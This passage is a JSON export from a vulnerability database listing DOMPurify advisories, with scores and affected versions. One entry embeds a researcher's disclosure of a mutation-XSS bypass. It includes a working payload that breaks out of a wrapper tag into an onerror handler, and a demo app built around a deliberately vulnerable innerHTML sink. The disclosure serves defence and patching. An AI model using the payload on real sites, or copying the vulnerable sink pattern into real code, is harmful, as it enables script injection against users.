://www.npmjs.com/advisories/1205","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.npmjs.com/advisories/1205"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-16728","reference_id":"CVE-2019-16728","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-16728"},{"reference_url":"https://github.com/advisories/GHSA-chqj-j4fh-rw7m","reference_id":"GHSA-chqj-j4fh-rw7m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-chqj-j4fh-rw7m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/447288?format=json","purl":"pkg:npm/dompurify@2.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-56ww-dvtp-8uc2"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-gzpp-fw72-57hu"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-nz3k-udjb-3fhz"},{"vulnerability":"VCID-wmjr-1h3n-hbhb"},{"vulnerability":"VCID-z8n7-dz6p-zqfb"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.1"},{"url":"http://public2.vulnerablecode.io/api/packages/16899?format=json","purl":"pkg:npm/dompurify@2.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-56ww-dvtp-8uc2"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-gzpp-fw72-57hu"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-nz3k-udjb-3fhz"},{"vulnerability":"VCID-wmjr-1h3n-hbhb"},{"vulnerability":"VCID-z8n7-dz6p-zqfb"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.3"}],"aliases":["CVE-2019-16728","GHSA-chqj-j4fh-rw7m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gbb5-2vbk-suh8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/326566?format=json","vulnerability_id":"VCID-gzpp-fw72-57hu","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-26870","reference_id":"","reference_type":"","scores":[{"value":"0.00417","scoring_system":"epss","scoring_elements":"0.62284","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00417","scoring_system":"epss","scoring_elements":"0.62176","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00417","scoring_system":"epss","scoring_elements":"0.62289","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00417","scoring_system":"epss","scoring_elements":"0.62278","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-26870"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/02724b8eb048dd219d6725b05c3000936f11d62d","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/commit/02724b8eb048dd219d6725b05c3000936f11d62d"},{"reference_url":"https://github.com/cure53/DOMPurify/compare/2.0.16...2.0.17","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/compare/2.0.16...2.0.17"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26870","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26870"},{"reference_url":"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-26870","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-26870"},{"reference_url":"https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass"},{"reference_url":"https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/","reference_id":"","reference_type":"","scores":[],"url":"https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/"},{"reference_url":"https://snyk.io/vuln/SNYK-JS-DOMPURIFY-1016634","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://snyk.io/vuln/SNYK-JS-DOMPURIFY-1016634"},{"reference_url":"https://github.com/advisories/GHSA-63q7-h895-m982","reference_id":"GHSA-63q7-h895-m982","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-63q7-h895-m982"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/382121?format=json","purl":"pkg:npm/dompurify@2.0.17","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-56ww-dvtp-8uc2"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-wmjr-1h3n-hbhb"},{"vulnerability":"VCID-z8n7-dz6p-zqfb"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.17"}],"aliases":["CVE-2020-26870","GHSA-63q7-h895-m982"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gzpp-fw72-57hu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360058?format=json","vulnerability_id":"VCID-jnpe-6ax6-zubr","summary":"DOMPurify is vulnerable to mutation-XSS via Re-Contextualization\n## Description\n\nA mutation-XSS (mXSS) condition was confirmed when sanitized HTML is reinserted into a new parsing context using `innerHTML` and special wrappers. The vulnerable wrappers confirmed in browser behavior are `script`, `xmp`, `iframe`, `noembed`, `noframes`, and `noscript`. The payload remains seemingly benign after `DOMPurify.sanitize()`, but mutates during the second parse into executable markup with an event handler, enabling JavaScript execution in the client (`alert(1)` in the PoC).\n\n\n## Vulnerability\n\nThe root cause is context switching after sanitization: sanitized output is treated as trusted and concatenated into a wrapper string (for example, `<xmp> ... </xmp>` or other special wrappers) before being reparsed by the browser. In this flow, attacker-controlled text inside an attribute (for example `</xmp>` or equivalent closing sequences for each wrapper) closes the special parsing context early and reintroduces attacker markup (`<img ... onerror=...>`) outside the original attribute context. DOMPurify sanitizes the original parse tree, but the application performs a second parse in a different context, reactivating dangerous tokens (classic mXSS pattern).\n\n## PoC\n\n1. Start the PoC app:\n```bash\nnpm install\nnpm start\n```\n\n2. Open `http://localhost:3001`.\n3. Set `Wrapper en sink` to `xmp`.\n4. Use payload:\n```html\n <img src=x alt=\"</xmp><img src=x onerror=alert('expoc')>\">\n```\n\n5. Click `Sanitize + Render`.\n6. Observe:\n- `Sanitized response` still contains the `</xmp>` sequence inside `alt`.\n- The sink reparses to include `<img src=\"x\" onerror=\"alert('expoc')\">`.\n- `alert('expoc')` is triggered.\n7. Files:\n- index.html\n\n```html\n<!doctype html>\n<html lang=\"en\">\n  <head>\n    <meta charset=\"utf-8\">\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n    <title>expoc - DOMPurify SSR PoC</title>\n    <style>\n      :root {\n        --bg: #f7f8fb;\n        --panel: #ffffff;\n        --line: #d8dce6;\n        --text: #0f172a;\n        --muted: #475569;\n        --accent: #0ea5e9;\n      }\n\n      * {\n        box-sizing: border-box;\n      }\n\n      body {\n        margin: 0;\n        font-family: \"SF Mono\", Menlo, Consolas, monospace;\n        color: var(--text);\n        background: radial-gradient(circle at 10% 0%, #e0f2fe 0%, var(--bg) 60%);\n      }\n\n      main {\n        max-width: 980px;\n        margin: 28px auto;\n        padding: 0 16px 20px;\n      }\n\n      h1 {\n        margin: 0 0 10px;\n        font-size: 1.45rem;\n      }\n\n      p {\n        margin: 0;\n        color: var(--muted);\n      }\n\n      .grid {\n        display: grid;\n        gap: 14px;\n        margin-top: 16px;\n      }\n\n      .card {\n        background: var(--panel);\n        border: 1px solid var(--line);\n        border-radius: 12px;\n        padding: 14px;\n      }\n\n      label {\n        display: block;\n        margin-bottom: 7px;\n        font-size: 0.85rem;\n        color: var(--muted);\n      }\n\n      textarea,\n      input,\n      select,\n      button {\n        width: 100%;\n        border: 1px solid var(--line);\n        border-radius: 8px;\n        padding: 9px 10px;\n        font: inherit;\n        background: #fff;\n      }\n\n      textarea {\n        min-height: 110px;\n        resize: vertical;\n      }\n\n      .row {\n        display: grid;\n        grid-template-columns: 1fr 230px;\n        gap: 12px;\n      }\n\n      button {\n        cursor: pointer;\n        background: var(--accent);\n        color: #fff;\n        border-color: #0284c7;\n      }\n\n      #sink {\n        min-height: 90px;\n        border: 1px dashed #94a3b8;\n        border-radius: 8px;\n        padding: 10px;\n        background: #f8fafc;\n      }\n\n      pre {\n        margin: 0;\n        white-space: pre-wrap;\n        word-break: break-word;\n      }\n\n      .note {\n        margin-top: 8px;\n        font-size: 0.85rem;\n      }\n\n      .status-grid {\n        display: grid;\n        grid-template-columns: repeat(auto-fit, minmax(180px, 1fr));\n        gap: 8px;\n        margin-top: 10px;\n      }\n\n      .status-item {\n        border: 1px solid var(--line);\n        border-radius: 8px;\n        padding: 8px 10px;\n        font-size: 0.85rem;\n        background: #fff;\n      }\n\n      .status-item.vuln {\n        border-color: #ef4444;\n        background: #fef2f2;\n      }\n\n      .status-item.safe {\n        border-color: #22c55e;\n        background: #f0fdf4;\n      }\n\n      @media (max-width: 760px) {\n        .row {\n          grid-template-columns: 1fr;\n        }\n      }\n    </style>\n  </head>\n  <body>\n    <main>\n      <h1>expoc - DOMPurify Server-Side PoC</h1>\n      <p>\n        Flujo: input -> POST /sanitize (Node + jsdom + DOMPurify) -> render vulnerable con innerHTML.\n      </p>\n\n      <div class=\"grid\">\n        <section class=\"card\">\n          <label for=\"payload\">Payload</label>\n          <textarea id=\"payload\"><img src=x alt=\"</script><img src=x onerror=alert('expoc')>\"></textarea>\n          <div class=\"row\" style=\"margin-top: 10px;\">\n            <div>\n              <label for=\"wrapper\">Wrapper en sink</label>\n              <select id=\"wrapper\">\n                <option value=\"div\">div</option>\n                <option value=\"textarea\">textarea</option>\n                <option value=\"title\">title</option>\n                <option value=\"style\">style</option>\n                <option value=\"script\" selected>script</option>\n                <option value=\"xmp\">xmp</option>\n                <option value=\"iframe\">iframe</option>\n                <option value=\"noembed\">noembed</option>\n                <option value=\"noframes\">noframes</option>\n                <option value=\"noscript\">noscript</option>\n              </select>\n            </div>\n            <div style=\"display:flex;align-items:end;\">\n              <button id=\"run\" type=\"button\">Sanitize + Render</button>\n            </div>\n          </div>\n          <p class=\"note\">Se usa render vulnerable: <code>sink.innerHTML = '&lt;wrapper&gt;' + sanitized + '&lt;/wrapper&gt;'</code>.</p>\n          <div class=\"status-grid\">\n            <div class=\"status-item vuln\">script (vulnerable)</div>\n            <div class=\"status-item vuln\">xmp (vulnerable)</div>\n            <div class=\"status-item vuln\">iframe (vulnerable)</div>\n            <div class=\"status-item vuln\">noembed (vulnerable)</div>\n            <div class=\"status-item vuln\">noframes (vulnerable)</div>\n            <div class=\"status-item vuln\">noscript (vulnerable)</div>\n            <div class=\"status-item safe\">div (no vulnerable)</div>\n            <div class=\"status-item safe\">textarea (no vulnerable)</div>\n            <div class=\"status-item safe\">title (no vulnerable)</div>\n            <div class=\"status-item safe\">style (no vulnerable)</div>\n          </div>\n        </section>\n\n        <section class=\"card\">\n          <label>Sanitized response</label>\n          <pre id=\"sanitized\">(empty)</pre>\n        </section>\n\n        <section class=\"card\">\n          <label>Sink</label>\n          <div id=\"sink\"></div>\n        </section>\n      </div>\n    </main>\n\n    <script>\n      const payload = document.getElementById('payload');\n      const wrapper = document.getElementById('wrapper');\n      const run = document.getElementById('run');\n      const sanitizedNode = document.getElementById('sanitized');\n      const sink = document.getElementById('sink');\n\n      run.addEventListener('click', async () => {\n        const response = await fetch('/sanitize', {\n          method: 'POST',\n          headers: { 'Content-Type': 'application/json' },\n          body: JSON.stringify({ input: payload.value })\n        });\n\n        const data = await response.json();\n        const sanitized = data.sanitized || '';\n        const w = wrapper.value;\n\n        sanitizedNode.textContent = sanitized;\n        sink.innerHTML = '<' + w + '>' + sanitized + '</' + w + '>';\n      });\n    </script>\n  </body>\n</html>\n```\n\n- server.js\n\n```js\nconst express = require('express');\nconst path = require('path');\nconst { JSDOM } = require('jsdom');\nconst createDOMPurify = require('dompurify');\n\nconst app = express();\nconst port = process.env.PORT || 3001;\n\nconst window = new JSDOM('').window;\nconst DOMPurify = createDOMPurify(window);\n\napp.use(express.json());\napp.use(express.static(path.join(__dirname, 'public')));\n\napp.get('/health', (_req, res) => {\n  res.json({ ok: true, service: 'expoc' });\n});\n\napp.post('/sanitize', (req, res) => {\n  const input = typeof req.body?.input === 'string' ? req.body.input : '';\n  const sanitized = DOMPurify.sanitize(input);\n  res.json({ sanitized });\n});\n\napp.listen(port, () => {\n  console.log(`expoc running at http://localhost:${port}`);\n});\n```\n\n- package.json\n\n```json\n{\n  \"name\": \"expoc\",\n  \"version\": \"1.0.0\",\n  \"main\": \"server.js\",\n  \"scripts\": {\n    \"test\": \"echo \\\"Error: no test specified\\\" && exit 1\",\n    \"start\": \"node server.js\",\n    \"dev\": \"node server.js\"\n  },\n  \"keywords\": [],\n  \"author\": \"\",\n  \"license\": \"ISC\",\n  \"description\": \"\",\n  \"dependencies\": {\n    \"dompurify\": \"^3.3.1\",\n    \"express\": \"^5.2.1\",\n    \"jsdom\": \"^28.1.0\"\n  }\n}\n```\n\n## Evidence\n\n- PoC\n\n[daft-video.webm](https://github.com/user-attachments/assets/499a593d-0241-4ab8-95a9-cf49a00bda90)\n\n- XSS triggered\n<img width=\"2746\" height=\"1588\" alt=\"daft-img\" src=\"https://github.com/user-attachments/assets/1f463c14-d5a3-4c93-94e4-12d2d02c7d15\" />\n\n## Why This Happens\nThis is a mutation-XSS pattern caused by a parse-context mismatch:\n\n- Parse 1 (sanitization phase): input is interpreted under normal HTML parsing rules.\n- Parse 2 (sink phase): sanitized output is embedded into a wrapper that changes parser state (`xmp` raw-text behavior).\n- Attacker-controlled sequence (`</xmp>`) gains structural meaning in parse 2 and alters DOM structure.\n\nSanitization is not a universal guarantee across all future parsing contexts. The sink design reintroduces risk.\n\n## Remediation Guidance\n1. Do not concatenate sanitized strings into new HTML wrappers followed by `innerHTML`.\n2. Keep the rendering context stable from sanitize to sink.\n3. Prefer DOM-safe APIs (`textContent`, `createElement`, `setAttribute`) over string-based HTML composition.\n4. If HTML insertion is required, sanitize as close as possible to final insertion context and avoid wrapper constructs with raw-text semantics (`xmp`, `script`, etc.).\n5. Add regression tests for context-switch/mXSS payloads (including `</xmp>`, `</noscript>`, similar parser-breakout markers).\n\nReported by Oscar Uribe, Security Researcher at Fluid Attacks. Camilo Vera and Cristian Vargas from the Fluid Attacks Research Team have identified a mXSS via Re-Contextualization in DomPurify 3.3.1.\n\nFollowing Fluid Attacks [Disclosure Policy](https://fluidattacks.com/advisories/policy), if this report corresponds to a vulnerability and the conditions outlined in the policy are met, this advisory will be published on the website over the next few days (the timeline may vary depending on maintainers' willingness to attend to and respond to this report) at the following URL: https://fluidattacks.com/advisories/daft\n\nAcknowledgements: [Camilo Vera](https://github.com/caverav/) and [Cristian Vargas](https://github.com/tachote).","references":[{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-h8r8-wccr-v5f2","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-h8r8-wccr-v5f2"},{"reference_url":"https://github.com/advisories/GHSA-h8r8-wccr-v5f2","reference_id":"GHSA-h8r8-wccr-v5f2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h8r8-wccr-v5f2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40110?format=json","purl":"pkg:npm/dompurify@3.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-8d4n-d1dh-4fe9"},{"vulnerability":"VCID-cmrb-k5pw-vffn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.3.2"}],"aliases":["GHSA-h8r8-wccr-v5f2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jnpe-6ax6-zubr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/205923?format=json","vulnerability_id":"VCID-nz3k-udjb-3fhz","summary":"Cross-Site Scripting in dompurify","references":[{"reference_url":"https://github.com/cure53/DOMPurify/releases/tag/2.0.7","reference_id":"","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/releases/tag/2.0.7"},{"reference_url":"https://www.npmjs.com/advisories/1223","reference_id":"","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.npmjs.com/advisories/1223"},{"reference_url":"https://github.com/advisories/GHSA-mjjq-c88q-qhr6","reference_id":"GHSA-mjjq-c88q-qhr6","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mjjq-c88q-qhr6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/17520?format=json","purl":"pkg:npm/dompurify@2.0.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-56ww-dvtp-8uc2"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-gzpp-fw72-57hu"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-wmjr-1h3n-hbhb"},{"vulnerability":"VCID-z8n7-dz6p-zqfb"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.7"}],"aliases":["GHSA-mjjq-c88q-qhr6","GMS-2020-711"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nz3k-udjb-3fhz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56525?format=json","vulnerability_id":"VCID-wmjr-1h3n-hbhb","summary":"DOMPurify is a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify was vulnerable to prototype pollution. This vulnerability is fixed in 2.4.2.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-48910.json","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-48910.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-48910","reference_id":"","reference_type":"","scores":[{"value":"0.02592","scoring_system":"epss","scoring_elements":"0.85978","published_at":"2026-06-13T12:55:00Z"},{"value":"0.02592","scoring_system":"epss","scoring_elements":"0.85971","published_at":"2026-06-14T12:55:00Z"},{"value":"0.02592","scoring_system":"epss","scoring_elements":"0.85968","published_at":"2026-06-12T12:55:00Z"},{"value":"0.02592","scoring_system":"epss","scoring_elements":"0.85919","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-48910"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48910","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48910"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2025/02/msg00010.html","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2025/02/msg00010.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-48910","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-48910"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2322949","reference_id":"2322949","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2322949"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/d1dd0374caef2b4c56c3bd09fe1988c3479166dc","reference_id":"d1dd0374caef2b4c56c3bd09fe1988c3479166dc","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-31T15:52:58Z/"}],"url":"https://github.com/cure53/DOMPurify/commit/d1dd0374caef2b4c56c3bd09fe1988c3479166dc"},{"reference_url":"https://github.com/advisories/GHSA-p3vf-v8qc-cwcr","reference_id":"GHSA-p3vf-v8qc-cwcr","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p3vf-v8qc-cwcr"},{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-p3vf-v8qc-cwcr","reference_id":"GHSA-p3vf-v8qc-cwcr","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-31T15:52:58Z/"}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-p3vf-v8qc-cwcr"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:10186","reference_id":"RHSA-2024:10186","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:10186"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:9583","reference_id":"RHSA-2024:9583","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:9583"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:9620","reference_id":"RHSA-2024:9620","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:9620"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:0079","reference_id":"RHSA-2025:0079","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:0079"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:0082","reference_id":"RHSA-2025:0082","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:0082"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:0654","reference_id":"RHSA-2025:0654","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:0654"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:0875","reference_id":"RHSA-2025:0875","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:0875"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:18233","reference_id":"RHSA-2025:18233","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:18233"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19003","reference_id":"RHSA-2025:19003","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19003"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19017","reference_id":"RHSA-2025:19017","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19017"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19047","reference_id":"RHSA-2025:19047","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19047"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19058","reference_id":"RHSA-2025:19058","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19058"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19306","reference_id":"RHSA-2025:19306","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19306"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19314","reference_id":"RHSA-2025:19314","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19314"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19895","reference_id":"RHSA-2025:19895","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19895"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:22284","reference_id":"RHSA-2025:22284","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:22284"},{"reference_url":"https://access.redhat.c